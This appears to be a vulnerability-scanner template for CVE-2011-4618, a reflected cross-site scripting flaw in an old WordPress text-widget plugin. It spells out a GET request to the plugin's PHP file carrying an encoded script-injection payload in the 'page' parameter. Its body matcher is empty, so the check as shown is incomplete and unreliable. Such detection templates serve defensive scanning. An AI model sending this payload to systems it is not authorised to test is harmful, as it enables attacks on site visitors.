id: CVE-2011-4618 info: name: Advanced Text Widget < 2.0.2 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium description: Cross-site scripting (XSS) vulnerability in advancedtext.php in Advanced Text Widget plugin before 2.0.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter. reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4618 tags: cve,cve2011,wordpress,xss,wp-plugin requests: - method: GET path: - '{{BaseURL}}/wp-content/plugins/advanced-text-widget/advancedtext.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - "" part: body - type: word part: header words: - text/html - type: status status: - 200